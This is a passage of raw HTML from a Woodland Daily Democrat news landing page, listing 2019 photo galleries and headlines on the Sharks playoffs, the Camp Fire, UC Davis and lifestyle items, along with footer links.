class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/02/26/photos-woodland-bridal-show-returns/" title="PHOTOS: Woodland Bridal Show returns"> <span class="dfm-title"> PHOTOS: Woodland Bridal Show returns </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-secondary"> <article class=" feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2548412" data-timestamp="1546398116"> <figure> <a href="https://www.dailydemocrat.com/2019/01/02/camp-fire-through-a-photographers-lens-2/" title="Camp Fire: Through a photographer’s lens" class=""></a> <a href="https://www.dailydemocrat.com/2019/01/02/camp-fire-through-a-photographers-lens-2/" title="Camp Fire: Through a photographer’s lens"> <div class="image-wrapper"><img alt="Camp Fire: Through a photographer’s lens" title="Camp Fire: Through a photographer’s lens" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/01/PHOTOS-94.jpg?w=284" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/01/PHOTOS-94.jpg?w=284 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/01/PHOTOS-94.jpg?w=326 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/01/PHOTOS-94.jpg?w=337 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/01/PHOTOS-94.jpg?w=402 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/01/PHOTOS-94.jpg?w=261 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/01/02/camp-fire-through-a-photographers-lens-2/" title="Camp Fire: Through a photographer’s lens"> <span class="dfm-title"> Camp Fire: Through a photographer’s lens </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-secondary"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587752" data-timestamp="1557952857"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/sharks-controversial-ot-game-winner-has-hockey-world-chirping/" title="Sharks&#8217; controversial OT game winner has hockey world chirping" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/15/sharks-controversial-ot-game-winner-has-hockey-world-chirping/" title="Sharks&#8217; controversial OT game winner has hockey world chirping"> <div class="image-wrapper"><img alt="On replay, it was clear Timo Meier batted the puck to Gus Nyquist, but a handpass is not reviewable under NHL rules. " title="On replay, it was clear Timo Meier batted the puck to Gus Nyquist, but a handpass is not reviewable under NHL rules. " class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-3112.jpg?w=237" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-3112.jpg?w=237 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-3112.jpg?w=272 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-3112.jpg?w=281 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-3112.jpg?w=335 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-3112.jpg?w=218 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/sharks-controversial-ot-game-winner-has-hockey-world-chirping/" title="Sharks&#8217; controversial OT game winner has hockey world chirping"> <span class="dfm-title"> Sharks&#8217; controversial OT game winner has hockey world chirping </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-secondary"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587730" data-timestamp="1557952165"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/photos-10-images-that-sum-up-sharks-game-3/" title="Photos: 10 images that sum up the San Jose Sharks&#8217; overtime win in Game 3" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/15/photos-10-images-that-sum-up-sharks-game-3/" title="Photos: 10 images that sum up the San Jose Sharks&#8217; overtime win in Game 3"> <div class="image-wrapper"><img alt="Everything started off well for San Jose in Game 3." title="Everything started off well for San Jose in Game 3." class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-19.jpg?w=247" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-19.jpg?w=247 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-19.jpg?w=284 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-19.jpg?w=293 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-19.jpg?w=350 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BNG-L-SHARKS-0516-19.jpg?w=227 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/photos-10-images-that-sum-up-sharks-game-3/" title="Photos: 10 images that sum up the San Jose Sharks&#8217; overtime win in Game 3"> <span class="dfm-title"> Photos: 10 images that sum up the San Jose Sharks&#8217; overtime win in Game 3 </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> </ul> </div> <button class="show-more-videos btn-show-more">Show More Photos</button> <div class="more-videos more-content-to-show"> <ul class="media-more"> <li class="media-feature-more"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587721" data-timestamp="1557952077"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/permanent-teal-san-jose-sharks-fans-get-logo-tattoos/" title="Permanent teal: San Jose Sharks fans get logo tattoos" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/15/permanent-teal-san-jose-sharks-fans-get-logo-tattoos/" title="Permanent teal: San Jose Sharks fans get logo tattoos"> <div class="image-wrapper"><img alt="The San Jose Sharks are offering free Sharks-themed tattoos on away-game days to 40 fans." title="The San Jose Sharks are offering free Sharks-themed tattoos on away-game days to 40 fans." class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-CLOTATOO-0516-81.jpg?w=281" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-CLOTATOO-0516-81.jpg?w=281 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-CLOTATOO-0516-81.jpg?w=323 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-CLOTATOO-0516-81.jpg?w=333 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-CLOTATOO-0516-81.jpg?w=398 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-CLOTATOO-0516-81.jpg?w=258 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/permanent-teal-san-jose-sharks-fans-get-logo-tattoos/" title="Permanent teal: San Jose Sharks fans get logo tattoos"> <span class="dfm-title"> Permanent teal: San Jose Sharks fans get logo tattoos </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-more"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587630" data-timestamp="1557928441"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/pge-lines-officially-caused-camp-fire-cal-fire-says/" title="Cal Fire investigation determines PG&amp;E lines caused Camp Fire" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/15/pge-lines-officially-caused-camp-fire-cal-fire-says/" title="Cal Fire investigation determines PG&amp;E lines caused Camp Fire"> <div class="image-wrapper"><img alt="Cal Fire investigation determines PG&amp;E lines caused Camp Fire" title="Cal Fire investigation determines PG&amp;E lines caused Camp Fire" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/PGEBONUSES-1.jpg?w=281" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/PGEBONUSES-1.jpg?w=281 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/PGEBONUSES-1.jpg?w=323 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/PGEBONUSES-1.jpg?w=333 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/PGEBONUSES-1.jpg?w=398 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/PGEBONUSES-1.jpg?w=258 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/pge-lines-officially-caused-camp-fire-cal-fire-says/" title="Cal Fire investigation determines PG&amp;E lines caused Camp Fire"> <span class="dfm-title"> Cal Fire investigation determines PG&amp;E lines caused Camp Fire </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-more"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587572" data-timestamp="1557917374"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/back-to-the-street-car-show-brings-thousands-downtown-photo-gallery/" title="&#8216;Back to the Street&#8217; car show brings thousands downtown | Photo Gallery" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/15/back-to-the-street-car-show-brings-thousands-downtown-photo-gallery/" title="&#8216;Back to the Street&#8217; car show brings thousands downtown | Photo Gallery"> <div class="image-wrapper"><img alt="&#039;Back to the Street&#039; car show brings thousands downtown | Photo Gallery" title="&#039;Back to the Street&#039; car show brings thousands downtown | Photo Gallery" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/GALLERYCARSHOW4.jpg?w=281" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/GALLERYCARSHOW4.jpg?w=281 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/GALLERYCARSHOW4.jpg?w=323 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/GALLERYCARSHOW4.jpg?w=333 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/GALLERYCARSHOW4.jpg?w=398 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/GALLERYCARSHOW4.jpg?w=258 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/back-to-the-street-car-show-brings-thousands-downtown-photo-gallery/" title="&#8216;Back to the Street&#8217; car show brings thousands downtown | Photo Gallery"> <span class="dfm-title"> &#8216;Back to the Street&#8217; car show brings thousands downtown | Photo Gallery </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-more"> <article class="video feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587545" data-timestamp="1557892847"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/bear-cub-named-paradise-returns-home-after-recovering-from-camp-fire-burns/" title="Bear cub named Paradise returns home after recovering from Camp Fire burns" class="icon-play-arrow"></a> <a href="https://www.dailydemocrat.com/2019/05/15/bear-cub-named-paradise-returns-home-after-recovering-from-camp-fire-burns/" title="Bear cub named Paradise returns home after recovering from Camp Fire burns"> <div class="image-wrapper"><img alt="The bear weighed only about 15 pounds when Fish and Wildlife wardens picked him up from a tree in a Yankee Hill backyard where he’d been living for several days, begging for food." title="The bear weighed only about 15 pounds when Fish and Wildlife wardens picked him up from a tree in a Yankee Hill backyard where he’d been living for several days, begging for food." class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/BEARCUB4.jpg?w=254" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/BEARCUB4.jpg?w=254 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BEARCUB4.jpg?w=292 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BEARCUB4.jpg?w=301 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BEARCUB4.jpg?w=360 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/BEARCUB4.jpg?w=233 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/bear-cub-named-paradise-returns-home-after-recovering-from-camp-fire-burns/" title="Bear cub named Paradise returns home after recovering from Camp Fire burns"> <span class="dfm-title"> Bear cub named Paradise returns home after recovering from Camp Fire burns </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-more"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587460" data-timestamp="1557882055"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/steph-curry-amused-with-parents-dueling-rooting-interests/" title="Steph Curry amused by parents&#8217; dueling rooting interests" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/15/steph-curry-amused-with-parents-dueling-rooting-interests/" title="Steph Curry amused by parents&#8217; dueling rooting interests"> <div class="image-wrapper"><img alt="Dell and Sonya Curry wore split Stephen &amp; Seth Curry jerseys for the Warriors-Trail Blazers playoff game." title="Dell and Sonya Curry wore split Stephen &amp; Seth Curry jerseys for the Warriors-Trail Blazers playoff game." class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/currys-1.jpg?w=300" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/currys-1.jpg?w=300 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/currys-1.jpg?w=365 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/currys-1.jpg?w=376 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/currys-1.jpg?w=449 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/currys-1.jpg?w=292 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/steph-curry-amused-with-parents-dueling-rooting-interests/" title="Steph Curry amused by parents&#8217; dueling rooting interests"> <span class="dfm-title"> Steph or Seth: Who were the Currys&#039; parents rooting for? </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> </ul> </div> </section> </div> </div> <div class="landing-three-one landing-row"> <div class="three-one-right"> </div> <div class="three-one-left"> <section class="section-highlight"> <h2 class="entry-title"> <a href="https://www.dailydemocrat.com/news/uc-davis/"> UC Davis<i class="icon-arrow-right"></i> </a> </h2> <div class="section-highlight-content"> <div class="section-feature"> <article class=" feature-medium archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587530" data-timestamp="1557908781"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/uc-davis-lab-works-on-food-production-without-waste/" title="UC Davis lab works on food production without waste" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/15/uc-davis-lab-works-on-food-production-without-waste/" title="UC Davis lab works on food production without waste"> <div class="image-wrapper"><img alt="UC Davis lab works on food production without waste" title="UC Davis lab works on food production without waste" class="lazyload size-section_wide_one" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/FOODWITHOUTWASTE.jpg?w=308" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/FOODWITHOUTWASTE.jpg?w=308 620w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/FOODWITHOUTWASTE.jpg?w=388 780w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/FOODWITHOUTWASTE.jpg?w=300 605w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/FOODWITHOUTWASTE.jpg?w=260 525w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/FOODWITHOUTWASTE.jpg?w=207 415w" ></div> </a> </figure> <div class="article-info"> <header> <h3 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/uc-davis-lab-works-on-food-production-without-waste/" title="UC Davis lab works on food production without waste"> <span class="dfm-title"> UC Davis lab works on food production without waste </span> </a> </h3> </header> <div class="excerpt"> Imagine food production without waste. Insects, such as darkling beetles and black soldier flies can... </div> </div><!-- .article-info --> </article> </div> <ul class="headline-list"> <li> <article class=" headline-only archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2586869" data-timestamp="1557750459"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/13/aggies-send-off-seniors-with-11-4-win-over-matadors/" title="Aggies send off seniors with 11-4 win over Matadors" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/13/aggies-send-off-seniors-with-11-4-win-over-matadors/" title="Aggies send off seniors with 11-4 win over Matadors"> <span class="dfm-title"> Aggies send off seniors with 11-4 win over Matadors </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2584063" data-timestamp="1557748166"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/13/how-genetics-and-distant-relative-helped-one-lucky-fish/" title="How genetics and distant relative helped one lucky fish" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/13/how-genetics-and-distant-relative-helped-one-lucky-fish/" title="How genetics and distant relative helped one lucky fish"> <span class="dfm-title"> How genetics and distant relative helped one lucky fish </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2585473" data-timestamp="1557299154"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/08/uc-davis-graduate-school-of-management-to-offer-online-mba/" title="UC Davis Graduate School of Management to offer online MBA" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/08/uc-davis-graduate-school-of-management-to-offer-online-mba/" title="UC Davis Graduate School of Management to offer online MBA"> <span class="dfm-title"> UC Davis Graduate School of Management to offer online MBA </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> </ul> </div> </section> <section class="section-highlight"> <h2 class="entry-title"> <a href="https://www.dailydemocrat.com/lifestyle/"> Lifestyle<i class="icon-arrow-right"></i> </a> </h2> <div class="section-highlight-content"> <div class="section-feature"> <article class=" feature-medium archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587769" data-timestamp="1557975618"> <figure> <a href="https://www.dailydemocrat.com/2019/05/16/horoscopes-may-16-2019/" title="Horoscopes: May 16, 2019" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/16/horoscopes-may-16-2019/" title="Horoscopes: May 16, 2019"> <div class="image-wrapper"><img alt="Horoscopes: May 16, 2019" title="Horoscopes: May 16, 2019" class="lazyload size-section_wide_one" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-EDPRAIL16-0916-0230.jpg?w=525" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-EDPRAIL16-0916-0230.jpg?w=525 620w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-EDPRAIL16-0916-0230.jpg?w=660 780w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-EDPRAIL16-0916-0230.jpg?w=510 605w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-EDPRAIL16-0916-0230.jpg?w=443 525w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/SJM-L-EDPRAIL16-0916-0230.jpg?w=353 415w" ></div> </a> </figure> <div class="article-info"> <header> <h3 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/horoscopes-may-16-2019/" title="Horoscopes: May 16, 2019"> <span class="dfm-title"> Horoscopes: May 16, 2019 </span> </a> </h3> </header> <div class="excerpt"> CELEBRITIES BORN ON THIS DAY: Megan Fox, 33; Tori Spelling, 46; Janet Jackson, 53; Pierce... </div> </div><!-- .article-info --> </article> </div> <ul class="headline-list"> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587542" data-timestamp="1557910610"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/california-dioceses-create-clergy-abuse-compensation-program/" title="Sexually abused children to receive compensation from California dioceses" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/california-dioceses-create-clergy-abuse-compensation-program/" title="Sexually abused children to receive compensation from California dioceses"> <span class="dfm-title"> Sexually abused children to receive compensation from California dioceses </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587536" data-timestamp="1557909975"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/alabama-ban-on-nearly-all-abortions-in-gop-governors-hands/" title="Alabama on the verge of banning nearly all abortions" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/alabama-ban-on-nearly-all-abortions-in-gop-governors-hands/" title="Alabama on the verge of banning nearly all abortions"> <span class="dfm-title"> Alabama on the verge of banning nearly all abortions </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587527" data-timestamp="1557906545"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/ayesha-curry-reveals-post-birth-breast-surgery-was-botched/" title="Ayesha Curry reveals post-birth breast surgery was &#8216;botched&#8217;" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/ayesha-curry-reveals-post-birth-breast-surgery-was-botched/" title="Ayesha Curry reveals post-birth breast surgery was &#8216;botched&#8217;"> <span class="dfm-title"> Ayesha Curry reveals post-birth breast surgery was &#8216;botched&#8217; </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> </ul> </div> </section> <section class="section-highlight"> <h2 class="entry-title"> <a href="https://www.dailydemocrat.com/opinion/"> Opinion<i class="icon-arrow-right"></i> </a> </h2> <div class="section-highlight-content"> <div class="section-feature"> <article class=" feature-medium archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2576929" data-timestamp="1555225215"> <figure> <a href="https://www.dailydemocrat.com/2019/04/14/ignoring-fire-risks-is-part-of-the-california-dream/" title="Ignoring fire risks is part of the California dream | Destined to Burn" class=""></a> <a href="https://www.dailydemocrat.com/2019/04/14/ignoring-fire-risks-is-part-of-the-california-dream/" title="Ignoring fire risks is part of the California dream | Destined to Burn"> <div class="image-wrapper"><img alt="As my wife, Cara, and I toured that same subdivision, I told her, &quot;This neighborhood is going to burn to the ground some day.&quot;We bought the house anyway." title="As my wife, Cara, and I toured that same subdivision, I told her, &quot;This neighborhood is going to burn to the ground some day.&quot;We bought the house anyway." class="lazyload size-section_wide_one" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/04/CaliforniaExperience_DK_1-1.jpg?w=526" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/04/CaliforniaExperience_DK_1-1.jpg?w=526 620w,https://www.dailydemocrat.com/wp-content/uploads/2019/04/CaliforniaExperience_DK_1-1.jpg?w=661 780w,https://www.dailydemocrat.com/wp-content/uploads/2019/04/CaliforniaExperience_DK_1-1.jpg?w=511 605w,https://www.dailydemocrat.com/wp-content/uploads/2019/04/CaliforniaExperience_DK_1-1.jpg?w=443 525w,https://www.dailydemocrat.com/wp-content/uploads/2019/04/CaliforniaExperience_DK_1-1.jpg?w=353 415w" ></div> </a> </figure> <div class="article-info"> <header> <h3 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/04/14/ignoring-fire-risks-is-part-of-the-california-dream/" title="Ignoring fire risks is part of the California dream | Destined to Burn"> <span class="dfm-title"> Ignoring fire risks is part of the California dream | Column </span> </a> </h3> </header> <div class="excerpt"> As my wife, Cara, and I toured that same subdivision, I told her, "This neighborhood... </div> </div><!-- .article-info --> </article> </div> <ul class="headline-list"> <li> <article class="slideshow headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2571107" data-timestamp="1553756422"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/03/28/exploring-the-california-super-bloom-on-table-mountain-outdoor-adventures/" title="Photos | Exploring the California super bloom on Table Mountain" class="icon-slideshow"></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/03/28/exploring-the-california-super-bloom-on-table-mountain-outdoor-adventures/" title="Photos | Exploring the California super bloom on Table Mountain"> <span class="dfm-title"> Photos | Exploring the California super bloom on Table Mountain </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> </ul> </div> </section> </div> </div> <div id="div-gpt-ad-bottom_leaderboard" class="dfp-ad dfp-bottom_leaderboard" data-ad-unit="bottom_leaderboard"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-bottom_leaderboard"); } ); } </script> </div> </div> </main><!-- #main --> </div><!-- #primary --> </div><!-- #content --> <footer class="site-footer"> <header class="footer-header"> <div class="footer-header-wrapper"> <ul id="footer-links-menu" class="footer-links"><li id="menu-item-154" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-154"><a href="https://www.dailydemocrat.com/weather/">Weather</a></li> <li id="menu-item-180" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-180"><a href="https://myaccount.dailydemocrat.com/Access.aspx?product=eEditionWD&#038;premium=y">E-Edition</a></li> <li id="menu-item-181" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-181"><a href="https://myaccount.dailydemocrat.com/">Subscribe</a></li> <li id="menu-item-179" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-179"><a href="https://www.dailydemocrat.com/newsletter/">Sign Up For Newsletters</a></li> </ul> <ul class="sharing"> <li> <a href="https://facebook.com/dailydemocrat" target="self" class="icon-facebook"> <span class="label">Facebook</span> </a> </li> <li> <a href="https://twitter.com/woodlandnews" target="self" class="icon-twitter"> <span class="label">Twitter</span> </a> </li> <li> <a href="https://instagram.com/thedailydemocrat" target="self" class="icon-instagram"> <span class="label">Instagram</span> </a> </li> <li> <a href="https://www.dailydemocrat.com/feed/" target="self" class="icon-feed"> <span class="label">RSS</span> </a> </li> </ul> </div> </header> <div class="footer-menus-wrapper"><ul id="footer-menu" class="footer-menus"><li id="menu-item-129" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-129"><a>About Us</a><span class="expander"><a href="#" class="icon-plus"></a></span> <ul class="footer-menu"> <li id="menu-item-130" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-130"><a href="http://www.norcalaudiencesolutions.com/">Advertise With Us</a></li> <li id="menu-item-2529988" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2529988"><a href="https://www.digitalfirstmedia.com/advertise-with-us/">MediaNews Group Advertising</a></li> <li id="menu-item-132" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-132"><a href="https://www.dailydemocrat.com/contact-us/">Contact Us</a></li> <li id="menu-item-133" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-133"><a href="http://woodlanddailydemocrat.ca.newsmemory.com/">E-Edition</a></li> <li id="menu-item-178702" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-178702"><a href="https://www.dailydemocrat.com/forms/">Announcement Forms</a></li> <li id="menu-item-136" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-136"><a href="https://careers-digitalfirstmedia.icims.com/jobs/">Work For Us</a></li> </ul> </li> <li id="menu-item-137" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-137"><a>Advertising Sections</a><span class="expander"><a href="#" class="icon-plus"></a></span> <ul class="footer-menu"> <li id="menu-item-138" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-138"><a href="http://marketplace.dailydemocrat.com/woodland">Classifieds</a></li> <li id="menu-item-139" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-139"><a href="https://businessdirectory.dailydemocrat.com/marketplace/">Local Guide</a></li> <li id="menu-item-141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-141"><a href="https://www.dailydemocrat.com/jobs/">Jobs</a></li> <li id="menu-item-142" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-142"><a href="https://www.gomnlt.com/dfm/daily-democrat/?utm_source=daily-democrat&#038;utm_medium=navweblink&#038;utm_campaign=dfm">Freelance Jobs</a></li> <li id="menu-item-143" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-143"><a href="http://homesforsale.dailydemocrat.com/">Real Estate</a></li> <li id="menu-item-144" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-144"><a href="https://businessdirectory.dailydemocrat.com/marketplace/todays_ads/">Today&#8217;s Ads</a></li> <li id="menu-item-148" 